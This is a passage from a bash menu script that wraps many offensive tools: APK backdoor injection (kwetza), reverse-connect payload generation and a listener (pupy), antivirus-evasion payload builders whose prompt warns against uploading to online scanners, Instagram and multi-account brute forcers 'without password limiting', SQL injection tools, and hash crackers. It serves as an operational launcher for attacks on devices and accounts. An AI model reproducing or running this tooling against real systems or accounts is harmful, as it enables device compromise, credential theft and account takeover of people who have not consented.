4913 elif [[ "$KEYLOG" = "31" ]]
4914 then
4915 if [[ -d /root/Enigma ]]
4916 then
4917 cd /root/Enigma
4918 python enigma.py
4919 else
4920 echo -e "$TNI"
4921 read INSTALL
4922 if [[ "$INSTALL" = "install" ]]
4923 then
4924 install_enigma
4925 else
4926 continue
4927 fi
4928 fi
4929 elif [[ "$KEYLOG" = "8" ]]
4930 then
4931 if [[ -d /root/CHAOS ]]
4932 then
4933 cd /root/CHAOS
4934 go run CHAOS.go
4935 else
4936 echo -e "$TNI"
4937 read INSTALL
4938 if [[ "$INSTALL" = "install" ]]
4939 then
4940 install_chaos
4941 else
4942 continue
4943 fi
4944 fi
4945 elif [[ "$KEYLOG" = "9" ]]
4946 then
4947 if [[ -d /root/kwetza ]]
4948 then
4949 cd /root/kwetza
4950 printf '\033]2;KWETZA\a'
4951 while true
4952 do
4953 clear
4954 if [[ "$APK" = "" ]]
4955 then
4956 APK="\e[1;31mNONE\e[m"
4957 fi
4958 if [[ "$APKLH" = "" ]]
4959 then
4960 APKLH="\e[1;31mNONE\e[m"
4961 fi
4962 if [[ "$APKLP" = "" ]]
4963 then
4964 APKLP="\e[1;31mNONE\e[m"
4965 fi
4966 if [[ "$APKPROT" = "" ]]
4967 then
4968 APKPROT="tcp"
4969 fi
4970 if [[ "$APKPERM" = "" ]]
4971 then
4972 APKPERM="yes"
4973 fi
4974 echo -e ""$YS" 1"$CE") Apk to infect CURRENT:$APK"
4975 echo -e ""$YS" 2"$CE") LHOST CURRENT:$APKLH"
4976 echo -e ""$YS" 3"$CE") LPORT CURRENT:$APKLP"
4977 echo -e ""$YS" 4"$CE") Protocol CURRENT:$APKPROT"
4978 echo -e ""$YS" 5"$CE") Add additional permissions CURRENT:$APKPERM"
4979 echo -e ""$YS" b"$CE") Go back"
4980 echo -e ""$YS" run"$CE") Infect apk"
4981 echo -e "Choose: "
4982 read APKK
4983 clear
4984 if [[ "$APKK" = 1 ]]
4985 then
4986 echo -e "Apk to infect(must be in /root/kwetza): "
4987 read APKTBI
4988 if [[ -f "$APKTBI" ]]
4989 then
4990 APK="$APKTBI"
4991 else
4992 echo -e ""$RS"/root/kwetza/"$APKTBI" not found"$CE""
4993 sleep 3
4994 fi
4995 elif [[ "$APKK" = 2 ]]
4996 then
4997 echo -e "LHOST: "
4998 read APKLH
4999 elif [[ "$APKK" = 3 ]]
5000 then
5001 echo -e "LPORT: "
5002 read APKLP
5003 elif [[ "$APKK" = 4 ]]
5004 then
5005 if [[ "$APKPROT" = "tcp" ]]
5006 then
5007 APKPROT="https"
5008 else
5009 APKPROT="tcp"
5010 fi
5011 elif [[ "$APKK" = 5 ]]
5012 then
5013 if [[ "$APKPERM" = "yes" ]]
5014 then
5015 APKPERM="no"
5016 else
5017 APKPERM="yes"
5018 fi
5019 elif [[ "$APKK" = "back" || "$APKK" = "b" ]]
5020 then
5021 break
5022 elif [[ "$APKK" = "run" ]]
5023 then
5024 if [[ "$APK" = "\e[1;31mNONE\e[m" ]]
5025 then
5026 echo -e ""$RS"No apk specified."$CE""
5027 sleep 3
5028 continue
5029 fi
5030 if [[ "$APKLH" = "\e[1;31mNONE\e[m" ]]
5031 then
5032 echo -e ""$RS"No LHOST specified."$CE""
5033 sleep 3
5034 continue
5035 fi
5036 if [[ "$APKLP" = "\e[1;31mNONE\e[m" ]]
5037 then
5038 echo -e ""$RS"No LPORT specified."$CE""
5039 sleep 3
5040 continue
5041 fi
5042 cd /root/kwetza
5043 python kwetza.py $APK $APKLH $APKPROT $APKLP $APKPERM
5044 echo -e "$PAKTGB"
5045 $READAK
5046 fi
5047 done
5048 else
5049 echo -e "$TNI"
5050 read INSTALL
5051 if [[ "$INSTALL" = "install" ]]
5052 then
5053 install_kwetza
5054 else
5055 continue
5056 fi
5057 fi
5058 elif [[ "$KEYLOG" = "7" ]]
5059 then
5060 if [[ -f /usr/bin/shellter ]]
5061 then
5062 shellter
5063 else
5064 echo -e "$TNI"
5065 read INSTALL
5066 if [[ "$INSTALL" = "install" ]]
5067 then
5068 install_shellter
5069 else
5070 continue
5071 fi
5072 fi
5073 elif [[ "$KEYLOG" = "2" ]]
5074 then
5075 if [[ -d /root/ezsploit ]]
5076 then
5077 cd /root/ezsploit/
5078 ./ezsploit.sh
5079 cd
5080 echo -e "Go to metasploit menu to create a listener(Option "$YS"14"$CE")"
5081 sleep 2
5082 echo -e "Press "$YS"any key"$CE" to leave..."
5083 $READAK
5084 exec bash "$0"
5085 else
5086 echo -e "$TNI"
5087 read INSTALL
5088 if [[ "$INSTALL" = "install" ]]
5089 then
5090 install_ezsploit
5091 else
5092 continue
5093 fi
5094 fi
5095 elif [[ "$KEYLOG" = "3" ]]
5096 then
5097 if [[ -d /root/pupy ]]
5098 then
5099 while true
5100 do
5101 clear
5102 echo -e ""$YS" 1"$CE") Generate a payload"
5103 echo -e ""$YS" 2"$CE") Start listener"
5104 echo -e ""$YS" b"$CE") Go back"
5105 echo -e ""$YS"00"$CE") Main menu"
5106 echo -e ""$YS" 0"$CE") EXIT"
5107 read -e PUPY
5108 if [[ "$PUPY" = "1" ]]
5109 then
5110 clear
5111 echo -e "Choose the target OS:"
5112 echo -e ""$YS" 1"$CE") Windows"
5113 echo -e ""$YS" 2"$CE") Linux"
5114 echo -e ""$YS" 3"$CE") Android"
5115 echo -e "Choose: "
5116 read -e TAROS
5117 if [[ "$TAROS" = "1" ]]
5118 then
5119 TAROS="windows"
5120 elif [[ "$TAROS" = "2" ]]
5121 then
5122 TAROS="linux"
5123 elif [[ "$TAROS" = "3" ]]
5124 then
5125 TAROS="android"
5126 else
5127 echo -e "Wrong choice.Returning to main manu..."
5128 sleep 2
5129 exec bash "$0"
5130 fi
5131 clear
5132 echo -e "Enter your ip: "
5133 read -e PUPYIP
5134 clear
5135 echo -e "Enter your port(e.g: 443): "
5136 read -e PUPYPORT
5137 clear
5138 echo -e "Enter the full output path(e.g: /root/Desktop/payload1.exe)"
5139 read -e PUPYPATH
5140 cd /root/pupy/pupy
5141 ./pupygen.py -O $TAROS -o "$PUPYPATH" connect --host "$PUPYIP":"$PUPYPORT"
5142 cd
5143 elif [[ "$PUPY" = "2" ]]
5144 then
5145 cd /root/pupy/pupy
5146 ./pupysh.py
5147 elif [[ "$PUPY" = "00" ]]
5148 then
5149 exec bash "$0"
5150 elif [[ "$PUPY" = "back" || "$PUPY" = "b" ]]
5151 then
5152 break
5153 elif [[ "$PUPY" = "0" ]]
5154 then
5155 exit
5156 fi
5157 done
5158 else
5159 echo -e "$TNI"
5160 read INSTALL
5161 if [[ "$INSTALL" = "install" ]]
5162 then
5163 install_pupy
5164 else
5165 continue
5166 fi
5167 fi
5168 elif [[ "$KEYLOG" = "4" ]]
5169 then
5170 if [[ -d /root/zirikatu ]]
5171 then
5172 clear
5173 echo -e "CAUTION: DO NOT upload it to anti-virus scanners online."
5174 sleep 3
5175 echo -e "You agree with that?("$YS"YES"$CE"/"$YS"*"$CE")"
5176 read MUSTBEYES
5177 if [[ "$MUSTBEYES" = "YES" ]]
5178 then
5179 clear
5180 cd /root/zirikatu
5181 ./zirikatu.sh
5182 cd
5183 fi
5184 else
5185 echo -e "$TNI"
5186 read INSTALL
5187 if [[ "$INSTALL" = "install" ]]
5188 then
5189 install_zirikatu
5190 else
5191 continue
5192 fi
5193 fi
5194 elif [[ "$KEYLOG" = "5" ]]
5195 then
5196 if [[ -d /root/TheFatRat ]]
5197 then
5198 fatrat
5199 else
5200 echo -e "$TNI"
5201 read INSTALL
5202 if [[ "$INSTALL" = "install" ]]
5203 then
5204 install_thefatrat
5205 else
5206 continue
5207 fi
5208 fi
5209 elif [[ "$KEYLOG" = "6" ]]
5210 then
5211 if [[ -d /root/Winpayloads ]]
5212 then
5213 cd /root/Winpayloads
5214 ./WinPayloads.py
5215 cd
5216 else
5217 echo -e "$TNI"
5218 read INSTALL
5219 if [[ "$INSTALL" = "install" ]]
5220 then
5221 install_winpayloads
5222 else
5223 continue
5224 fi
5225 fi
5226 elif [[ "$KEYLOG" = "00" ]]
5227 then
5228 clear
5229 exec bash "$0"
5230 elif [[ "$KEYLOG" = "0" ]]
5231 then
5232 clear
5233 exit
5234 elif [[ "$KEYLOG" = "back" || "$KEYLOG" = "b" ]]
5235 then
5236 break
5237 fi
5238 echo -e "$PAKTGB"
5239 $READAK
5240 done
5241}
5242function information_gathering
5243{
5244 while true
5245 do
5246 clear
5247 TERMINALTITLE="INFORMATION GATHERING"
5248 dash_calc
5249 printf '\033]2;INFORMATION GATHERING\a'
5250 if [[ -d /usr/share/sniper ]]
5251 then
5252 echo -e ""$YS" 1"$CE") Sniper Automated Pentest Recon Scanner"
5253 else
5254 echo -e ""$RS" 1"$CE") "$RS"Sniper"$CE" Automated Pentest Recon Scanner"
5255 fi
5256 if [[ -d /root/ReconDog ]]
5257 then
5258 echo -e ""$YS" 2"$CE") ReconDog All in one tool"
5259 else
5260 echo -e ""$RS" 2"$CE") "$RS"ReconDog"$CE" All in one tool"
5261 fi
5262 if [[ -d /root/RED_HAWK ]]
5263 then
5264 echo -e ""$YS" 3"$CE") RED HAWK All in one tool"
5265 else
5266 echo -e ""$RS" 3"$CE") "$RS"RED HAWK"$CE" All in one tool"
5267 fi
5268 if [[ -d /root/Infoga ]]
5269 then
5270 echo -e ""$YS" 4"$CE") Infoga Email Information Gathering"
5271 else
5272 echo -e ""$RS" 4"$CE") "$RS"Infoga"$CE" Email Information Gathering"
5273 fi
5274 if [[ -d /root/KnockMail ]]
5275 then
5276 echo -e ""$YS" 5"$CE") KnockMail Verify if email exists"
5277 else
5278 echo -e ""$RS" 5"$CE") "$RS"KnockMail"$CE" Verify if email exists"
5279 fi
5280 if [[ -d /root/operative-framework ]]
5281 then
5282 echo -e ""$YS" 6"$CE") Operative-framework Get information on website or target"
5283 else
5284 echo -e ""$RS" 6"$CE") "$RS"Operative-framework"$CE" Get information on website or target"
5285 fi
5286 if [[ -d /root/osrframework ]]
5287 then
5288 echo -e ""$YS" 7"$CE") Osrfconsole Perform accurate online researches"
5289 else
5290 echo -e ""$RS" 7"$CE") "$RS"Osrfconsole"$CE" Perform accurate online researches"
5291 fi
5292 echo -e ""$YS" b"$CE") Go back"
5293 echo -e ""$YS"00"$CE") Main menu"
5294 echo -e "Choose: "
5295 read INFOG
5296 clear
5297 if [[ "$INFOG" = 1 ]]
5298 then
5299 if [[ -d /usr/share/sniper ]]
5300 then
5301 echo -e "Enter the domain you want to scan: "
5302 read DOMAIN
5303 clear
5304 sniper $DOMAIN
5305 else
5306 echo -e "$TNI"
5307 read INSTALL
5308 if [[ "$INSTALL" = "install" ]]
5309 then
5310 install_sniper
5311 else
5312 continue
5313 fi
5314 fi
5315 elif [[ "$INFOG" = 2 ]]
5316 then
5317 if [[ -d /root/ReconDog ]]
5318 then
5319 cd /root/ReconDog
5320 python dog.py
5321 cd
5322 else
5323 echo -e "$TNI"
5324 read INSTALL
5325 if [[ "$INSTALL" = "install" ]]
5326 then
5327 install_recondog
5328 else
5329 continue
5330 fi
5331 fi
5332 elif [[ "$INFOG" = 3 ]]
5333 then
5334 if [[ -d /root/RED_HAWK ]]
5335 then
5336 cd /root/RED_HAWK
5337 php rhawk.php
5338 cd
5339 else
5340 echo -e "$TNI"
5341 read INSTALL
5342 if [[ "$INSTALL" = "install" ]]
5343 then
5344 install_redhawk
5345 else
5346 continue
5347 fi
5348
5349 fi
5350 elif [[ "$INFOG" = 4 ]]
5351 then
5352 if [[ -d /root/Infoga ]]
5353 then
5354 echo -e "Domain to search:"
5355 read INFOTARG
5356 echo -e "Data source(e.g. "$YS"all"$CE","$YS"google"$CE","$YS"bing"$CE","$YS"yahoo"$CE","$YS"pgp"$CE"): "
5357 read INFOSOUR
5358 clear
5359 cd /root/Infoga
5360 python infoga.py -t $INFOTARG -s $INFOSOUR
5361 echo -e "$PAKTGB"
5362 $READAK
5363 cd
5364 else
5365 echo -e "$TNI"
5366 read INSTALL
5367 if [[ "$INSTALL" = "install" ]]
5368 then
5369 install_infoga
5370 else
5371 continue
5372 fi
5373
5374 fi
5375 elif [[ "$INFOG" = 5 ]]
5376 then
5377 if [[ -d /root/KnockMail ]]
5378 then
5379 clear
5380 cd /root/KnockMail
5381 python2.7 knock.py
5382 cd
5383 else
5384 echo -e "$TNI"
5385 read INSTALL
5386 if [[ "$INSTALL" = "install" ]]
5387 then
5388 install_knockmail
5389 else
5390 continue
5391 fi
5392
5393 fi
5394 elif [[ "$INFOG" = 6 ]]
5395 then
5396 if [[ -d /root/operative-framework ]]
5397 then
5398 clear
5399 cd /root/operative-framework
5400 python2.7 operative.py
5401 cd
5402 else
5403 echo -e "$TNI"
5404 read INSTALL
5405 if [[ "$INSTALL" = "install" ]]
5406 then
5407 install_operative
5408 else
5409 continue
5410 fi
5411
5412 fi
5413 elif [[ "$INFOG" = "7" ]]
5414 then
5415 if [[ -d "/root/hakkuframework" ]]
5416 then
5417 while true
5418 do
5419 printf '\033]2;OSRFCONSOLE\a'
5420 clear
5421 echo -e ""$YS" 1"$CE") usufy"
5422 echo -e ""$YS" 2"$CE") mailfy"
5423 echo -e ""$YS" 3"$CE") searchfy"
5424 echo -e ""$YS" 4"$CE") domainfy"
5425 echo -e ""$YS" 5"$CE") phonefy"
5426 echo -e ""$YS" 6"$CE") entify"
5427 echo -e ""$YS" b"$CE") Go back"
5428 echo -e ""$YS"00"$CE") Main menu"
5429 # echo -e ""$YS" 0"$CE") EXIT"
5430 echo -e "Choose: "
5431 read -e OSFR
5432 clear
5433 if [[ "$OSFR" = "1" ]]
5434 then
5435 echo -e "Use: usufy.py -n name1 name2 -p twitter facebook"
5436 usufy.py
5437 exit
5438 elif [[ "$OSFR" = "2" ]]
5439 then
5440 echo -e "Use: mailfy.py -n name1"
5441 mailfy.py
5442 exit
5443 elif [[ "$OSFR" = "3" ]]
5444 then
5445 searchfy.py
5446 exit
5447 elif [[ "$OSFR" = "4" ]]
5448 then
5449 domainfy.py
5450 exit
5451 elif [[ "$OSFR" = "5" ]]
5452 then
5453 phonefy.py
5454 exit
5455 elif [[ "$OSFR" = "6" ]]
5456 then
5457 entify.py
5458 exit
5459 elif [[ "$OSFR" = "0" ]]
5460 then
5461 exit
5462 elif [[ "$OSFR" = "00" ]]
5463 then
5464 exec bash "$0"
5465 elif [[ "$OSFR" = "back" || "$OSFR" = "b" ]]
5466 then
5467 break
5468 else
5469 echo -e "Wrong choice"
5470 sleep 0.3
5471 clear
5472 exec bash "$0"
5473 fi
5474 done
5475 else
5476 echo -e "$TNI"
5477 read INSTALL
5478 if [[ "$INSTALL" = "install" ]]
5479 then
5480 install_osrframework
5481 else
5482 continue
5483 fi
5484 fi
5485 elif [[ "$INFOG" = 0 ]]
5486 then
5487 exit
5488 elif [[ "$INFOG" = 00 ]]
5489 then
5490 exec bash $0
5491 elif [[ "$INFOG" = "back" || "$INFOG" = "b" ]]
5492 then
5493 break
5494 fi
5495 echo -e "$PAKTGB"
5496 $READAK
5497 done
5498}
5499function website_tools
5500{
5501 while true
5502 do
5503 clear
5504 TERMINALTITLE="WEBSITE TOOLS"
5505 dash_calc
5506 printf '\033]2;WEBSITE TOOLS\a'
5507 if [[ -f /usr/bin/sqlmap ]]
5508 then
5509 echo -e ""$YS" 1"$CE") SQLmap Automatic SQL injection and database takeover tool"
5510 else
5511 echo -e ""$RS" 1"$CE") "$RS"SQLmap"$CE" Automatic SQL injection and database takeover tool"
5512 fi
5513 if [[ -d /root/leviathan ]]
5514 then
5515 echo -e ""$YS" 2"$CE") Leviathan Wide range mass audit toolkit"
5516 else
5517 echo -e ""$RS" 2"$CE") "$RS"Leviathan"$CE" Wide range mass audit toolkit"
5518 fi
5519 if [[ -d /root/NoSQLMap ]]
5520 then
5521 echo -e ""$YS" 3"$CE") NoSQLMap Automated NoSQL exploitation tool"
5522 else
5523 echo -e ""$RS" 3"$CE") "$RS"NoSQLMap"$CE" Automated NoSQL exploitation tool"
5524 fi
5525 if [[ -d /root/Yuki-Chan-The-Auto-Pentest ]]
5526 then
5527 echo -e ""$YS" 4"$CE") Yuki Chan Automated Pentest Tool"
5528 else
5529 echo -e ""$RS" 4"$CE") "$RS"Yuki Chan"$CE" Automated Pentest Tool"
5530 fi
5531 if [[ -d /root/Blazy ]]
5532 then
5533 echo -e ""$YS" 5"$CE") Blazy Login bruteforcer/tests for CSRF, Cj, Cloudflare, WAF"
5534 else
5535 echo -e ""$RS" 5"$CE") "$RS"Blazy"$CE" Login bruteforcer/tests for CSRF, Clickjacking, Cloudflare and WAF"
5536 fi
5537 if [[ -d /root/Striker ]]
5538 then
5539 echo -e ""$YS" 6"$CE") Striker An offensive information and vulnerability scanner"
5540 else
5541 echo -e ""$RS" 6"$CE") "$RS"Striker"$CE" An offensive information and vulnerability scanner"
5542 fi
5543 if [[ -d /root/hyprPulse ]]
5544 then
5545 echo -e ""$YS" 7"$CE") HyprPulse Brute force multiple accounts at once"
5546 else
5547 echo -e ""$RS" 7"$CE") "$RS"HyprPulse"$CE" Brute force multiple accounts at once"
5548 fi
5549 if [[ -d /root/hyprPulse ]]
5550 then
5551 echo -e ""$YS" 8"$CE") InstaBurst A faster way to brute force Instagram"
5552 else
5553 echo -e ""$RS" 8"$CE") "$RS"InstaBurst"$CE" A faster way to brute force Instagram"
5554 fi
5555 if [[ -f /usr/local/bin/instagram-py ]]
5556 then
5557 echo -e ""$YS" 9"$CE") Instagram-py Brute force Instagram without password limiting"
5558 else
5559 echo -e ""$RS" 9"$CE") "$RS"Instagram-py"$CE" Brute force Instagram without password limiting"
5560 fi
5561 if [[ -d /root/datasploit ]]
5562 then
5563 echo -e ""$YS"10"$CE") Datasploit Recon on Companies, People, Phone, Bitcoin..."
5564 else
5565 echo -e ""$RS"10"$CE") "$RS"Datasploit"$CE" Recon on Companies, People, Phone, Bitcoin..."
5566 fi
5567 if [[ -d /root/SiteBroker ]]
5568 then
5569 echo -e ""$YS"11"$CE") SiteBroker Utility to penetrate and test websites"
5570 else
5571 echo -e ""$RS"11"$CE") "$RS"SiteBroker"$CE" Utility to penetrate and test websites"
5572 fi
5573 echo -e ""$YS" b"$CE") Go back"
5574 echo -e ""$YS"00"$CE") Main menu"
5575 echo -e "Choose: "
5576 read WEB
5577 clear
5578 if [[ "$WEB" = 1 ]]
5579 then
5580 if [[ -f /usr/bin/sqlmap ]]
5581 then
5582 sqlmap_menu
5583 else
5584 echo -e "$TNI"
5585 read INSTALL
5586 if [[ "$INSTALL" = "install" ]]
5587 then
5588 install_sqlmap
5589 else
5590 continue
5591 fi
5592 fi
5593 elif [[ "$WEB" = 2 ]]
5594 then
5595 if [[ -d /root/leviathan ]]
5596 then
5597 cd /root/leviathan
5598 python leviathan.py
5599 else
5600 echo -e "$TNI"
5601 read INSTALL
5602 if [[ "$INSTALL" = "install" ]]
5603 then
5604 install_leviathan
5605 else
5606 continue
5607 fi
5608 fi
5609 elif [[ "$WEB" = 3 ]]
5610 then
5611 if [[ -d /root/NoSQLMap ]]
5612 then
5613 cd /root/NoSQLMap
5614 python nosqlmap.py
5615 else
5616 echo -e "$TNI"
5617 read INSTALL
5618 if [[ "$INSTALL" = "install" ]]
5619 then
5620 install_nosqlmap
5621 else
5622 continue
5623 fi
5624 fi
5625 elif [[ "$WEB" = 4 ]]
5626 then
5627 if [[ -d /root/Yuki-Chan-The-Auto-Pentest ]]
5628 then
5629 cd /root/Yuki-Chan-The-Auto-Pentest
5630 ./yuki.sh
5631 echo -e "$PAKTGB"
5632 $READAK
5633 else
5634 echo -e "$TNI"
5635 read INSTALL
5636 if [[ "$INSTALL" = "install" ]]
5637 then
5638 install_yuki
5639 else
5640 continue
5641 fi
5642 fi
5643 elif [[ "$WEB" = 5 ]]
5644 then
5645 if [[ -d /root/Blazy ]]
5646 then
5647 cd /root/Blazy
5648 python blazy.py
5649 echo -e "$PAKTGB"
5650 $READAK
5651 else
5652 echo -e "$TNI"
5653 read INSTALL
5654 if [[ "$INSTALL" = "install" ]]
5655 then
5656 install_blazy
5657 else
5658 continue
5659 fi
5660 fi
5661 elif [[ "$WEB" = 6 ]]
5662 then
5663 if [[ -d /root/Striker ]]
5664 then
5665 cd /root/Striker
5666 python striker.py
5667 echo -e "$PAKTGB"
5668 $READAK
5669 else
5670 echo -e "$TNI"
5671 read INSTALL
5672 if [[ "$INSTALL" = "install" ]]
5673 then
5674 install_striker
5675 else
5676 continue
5677 fi
5678 fi
5679 elif [[ "$WEB" = 7 ]]
5680 then
5681 if [[ -d /root/hyprPulse ]]
5682 then
5683 cd /root/hyprPulse
5684 python pulsar.py
5685 echo -e "$PAKTGB"
5686 $READAK
5687 else
5688 echo -e "$TNI"
5689 read INSTALL
5690 if [[ "$INSTALL" = "install" ]]
5691 then
5692 install_hyprpulse
5693 else
5694 continue
5695 fi
5696 fi
5697 elif [[ "$WEB" = 8 ]]
5698 then
5699 if [[ -d /root/InstaBurst ]]
5700 then
5701 cd /root/InstaBurst
5702 python instagram.py
5703 echo -e "$PAKTGB"
5704 $READAK
5705 else
5706 echo -e "$TNI"
5707 read INSTALL
5708 if [[ "$INSTALL" = "install" ]]
5709 then
5710 install_instaburst
5711 else
5712 continue
5713 fi
5714 fi
5715 elif [[ "$WEB" = 9 ]]
5716 then
5717 if [[ -f /usr/local/bin/instagram-py ]]
5718 then
5719 while true
5720 do
5721 clear
5722 TERMINALTITLE="Instagram-py"
5723 dash_calc
5724 printf '\033]2;Instagram-py\a'
5725 echo -e " "$YS"1"$CE") New attack"
5726 echo -e " "$YS"2"$CE") Continue previous attack"
5727 echo -e " "$YS"3"$CE") View cracked passwords"
5728 echo -e " "$YS"4"$CE") Create configuration"
5729 echo -e " "$YS"b"$CE") Go back"
5730 read C
5731 clear
5732 if [[ "$C" == 1 ]]
5733 then
5734 echo -e ""$YS"Username: "$CE""
5735 read USRNM
5736 echo -e ""$YS"Wordlist path: "$CE""
5737 read WRDLST
5738 if [[ ! -f "$WRDLST" ]]
5739 then
5740 echo -e ""$RS"File not found"$CE""
5741 sleep 2
5742 continue
5743 fi
5744 instagram-py -vvv -u "$USRNM" -pl "$WRDLST"
5745 echo -e "$PAKTGB"
5746 $READAK
5747 elif [[ "$C" == 2 ]]
5748 then
5749 echo -e ""$YS"Username: "$CE""
5750 read USRNM
5751 echo -e ""$YS"Wordlist path: "$CE""
5752 read WRDLST
5753 if [[ ! -f "$WRDLST" ]]
5754 then
5755 echo -e ""$RS"File not found"$CE""
5756 sleep 2
5757 continue
5758 fi
5759 instagram-py -vvv -c -u "$USRNM" -pl "$WRDLST"
5760 echo -e "$PAKTGB"
5761 $READAK
5762 elif [[ "$C" == 3 ]]
5763 then
5764 echo -e ""$YS"Username: "$CE""
5765 read USRNM
5766 instagram-py -i "$USRNM"
5767 echo -e "$PAKTGB"
5768 $READAK
5769 elif [[ "$C" == 4 ]]
5770 then
5771 instagram-py -cc
5772 echo -e "$PAKTGB"
5773 $READAK
5774 elif [[ "$C" == "b" || "$C" == "back" ]]
5775 then
5776 clear
5777 break
5778 elif [[ "$C" == 0 ]]
5779 then
5780 clear
5781 exit
5782 elif [[ "$C" == 00 ]]
5783 then
5784 exec bash $0
5785 fi
5786 done
5787 else
5788 echo -e "$TNI"
5789 read INSTALL
5790 if [[ "$INSTALL" = "install" ]]
5791 then
5792 install_instagram-py
5793 else
5794 continue
5795 fi
5796 fi
5797 elif [[ "$WEB" = 10 ]]
5798 then
5799 if [[ -d /root/datasploit ]]
5800 then
5801 echo -e ""$YS"Domain: "$CE""
5802 read DMN
5803 cd /root/datasploit
5804 python datasploit.py -i "$DMN"
5805 echo -e "$PAKTGB"
5806 $READAK
5807 else
5808 echo -e "$TNI"
5809 read INSTALL
5810 if [[ "$INSTALL" = "install" ]]
5811 then
5812 install_datasploit
5813 else
5814 continue
5815 fi
5816 fi
5817 elif [[ "$WEB" = 11 ]]
5818 then
5819 if [[ -d /root/SiteBroker ]]
5820 then
5821 cd /root/SiteBroker
5822 python SiteBroker.py
5823 echo -e "$PAKTGB"
5824 $READAK
5825 else
5826 echo -e "$TNI"
5827 read INSTALL
5828 if [[ "$INSTALL" = "install" ]]
5829 then
5830 install_sitebroker
5831 else
5832 continue
5833 fi
5834 fi
5835
5836 elif [[ "$WEB" = "" ]]
5837 then
5838 continue
5839 elif [[ "$WEB" = 0 ]]
5840 then
5841 exit
5842 elif [[ "$WEB" = 00 ]]
5843 then
5844 exec bash $0
5845 elif [[ "$WEB" = "back" || "$WEB" = "b" ]]
5846 then
5847 break
5848 fi
5849 #~ echo -e "$PAKTGB"
5850 #~ $READAK
5851 done
5852}
5853function other_tools
5854{
5855while true
5856do
5857 printf '\033]2;OTHER TOOLS\a'
5858 clear
5859 TERMINALTITLE="OTHER TOOLS"
5860 dash_calc
5861 if [[ -f /usr/bin/geany ]]
5862 then
5863 echo -e ""$YS" 1"$CE") Geany Best notepad for linux"
5864 else
5865 echo -e ""$RS" 1"$CE") "$RS"Geany"$CE" Best notepad for linux"
5866 fi
5867 if [[ -d /root/dagon ]]
5868 then
5869 echo -e ""$YS" 2"$CE") Dagon Hash cracker/Advanced Hash Manipulation"
5870 else
5871 echo -e ""$RS" 2"$CE") "$RS"Dagon"$CE" Hash cracker/Advanced Hash Manipulation"
5872 fi
5873 if [[ -d /root/LALIN ]]
5874 then
5875 echo -e ""$YS" 3"$CE") LALIN Automatically install any package for pentest "
5876 else
5877 echo -e ""$RS" 3"$CE") "$RS"LALIN"$CE" Automatically install any package for pentest "
5878 fi
5879 if [[ -d /root/cupp ]]
5880 then
5881 echo -e ""$YS" 4"$CE") Cupp Make specific worldlists"
5882 else
5883 echo -e ""$RS" 4"$CE") "$RS"Cupp"$CE" Make specific worldlists"
5884 fi
5885 if [[ -d /root/cupp ]]
5886 then
5887 echo -e ""$YS" 5"$CE") Bleachbit Free up space"
5888 else
5889 echo -e ""$RS" 5"$CE") "$RS"Bleachbit"$CE" Free up space"
5890 fi
5891 if [[ -d /root/Hash-Buster ]]
5892 then
5893 echo -e ""$YS" 6"$CE") Hash Buster Hash cracker"
5894 else
5895 echo -e ""$RS" 6"$CE") "$RS"Hash Buster"$CE" Hash cracker"
5896 fi
5897 if [[ -d /root/patator ]]
5898 then
5899 echo -e ""$YS" 7"$CE") Patator Bruteforcer"
5900 else
5901 echo -e ""$RS" 7"$CE") "$RS"Patator"$CE" Bruteforcer"
5902 fi
5903 echo -e ""$YS" b"$CE") Go back"
5904 echo -e ""$YS" 0"$CE") EXIT"
5905 echo -e "Choose: "
5906 read -e OTHERT
5907 clear
5908 if [[ "$OTHERT" = 1 ]]
5909 then
5910 if [[ -f /usr/bin/geany ]]
5911 then
5912 geany
5913 else
5914 echo -e "$TNI"
5915 read INSTALL
5916 if [[ "$INSTALL" = "install" ]]
5917 then
5918 install_geany
5919 else
5920 continue
5921 fi
5922
5923 fi
5924 elif [[ "$OTHERT" = 2 ]]
5925 then
5926 if [[ -d /root/dagon ]]
5927 then
5928 dagon_script
5929 else
5930 echo -e "$TNI"
5931 read INSTALL
5932 if [[ "$INSTALL" = "install" ]]
5933 then
5934 install_dagon
5935 else
5936 continue
5937 fi
5938
5939 fi
5940 elif [[ "$OTHERT" = 3 ]]
5941 then
5942 if [[ -d /root/LALIN ]]
5943 then
5944 cd /root/LALIN
5945 ./Lalin.sh
5946 cd
5947 else
5948 echo -e "$TNI"
5949 read INSTALL
5950 if [[ "$INSTALL" = "install" ]]
5951 then
5952 install_lalin
5953 else
5954 continue
5955 fi
5956 fi
5957 elif [[ "$OTHERT" = "4" ]]
5958 then
5959 if [[ -d "/root/cupp" ]]
5960 then
5961 cd /root/cupp
5962 python cupp.py -i
5963 cd
5964 echo -e "$PAKTGB"
5965 $READAK
5966 else
5967 echo -e "$TNI"
5968 read INSTALL
5969 if [[ "$INSTALL" = "install" ]]
5970 then
5971 install_cupp
5972 else
5973 continue
5974 fi
5975 fi
5976 elif [[ "$OTHERT" = "5" ]]
5977 then
5978 if [[ -f "/usr/bin/bleachbit" ]]
5979 then
5980 bleachbit
5981 else
5982 echo -e "$TNI"
5983 read INSTALL
5984 if [[ "$INSTALL" = "install" ]]
5985 then
5986 install_bleachbit
5987 else
5988 continue
5989 fi
5990 fi
5991 elif [[ "$OTHERT" = "6" ]]
5992 then
5993 if [[ -d "/root/Hash-Buster" ]]
5994 then
5995 cd /root/Hash-Buster
5996 python hash.py
5997 echo -e "$PAKTGB"
5998 $READAK
5999 else
6000 echo -e "$TNI"
6001 read INSTALL
6002 if [[ "$INSTALL" = "install" ]]
6003 then
6004 install_hashbuster
6005 else
6006 continue
6007 fi
6008 fi
6009 elif [[ "$OTHERT" = "7" ]]
6010 then
6011 if [[ -d "/root/patator" ]]
6012 then
6013 patator_automation
6014 echo -e "$PAKTGB"
6015 $READAK
6016 else
6017 echo -e "$TNI"
6018 read INSTALL
6019 if [[ "$INSTALL" = "install" ]]
6020 then
6021 install_patator
6022 else
6023 continue
6024 fi
6025 fi
6026 elif [[ "$OTHERT" = 00 ]]
6027 then
6028 clear
6029 exec bash $0
6030 elif [[ "$OTHERT" = "back" || "$OTHERT" = "b" ]]
6031 then
6032 break
6033 elif [[ "$OTHERT" = 0 ]]
6034 then
6035 clear
6036 exit
6037 fi
6038done
6039}
6040function findsploit_menu
6041{
6042 clear
6043 echo -e "Search: "
6044 read FSEARCH
6045 findsploit "$FSEARCH"
6046 echo -e "$PAKTGB"
6047 $READAK
6048}
6049function metasploit_menu
6050{
6051 if [[ ! -d "$LPATH"/rc ]]
6052 then
6053 mkdir "$LPATH"/rc
6054 fi
6055 while true
6056 do
6057 clear
6058 TERMINALTITLE="METASPLOIT"
6059 dash_calc
6060 printf '\033]2;METASPLOIT\a'
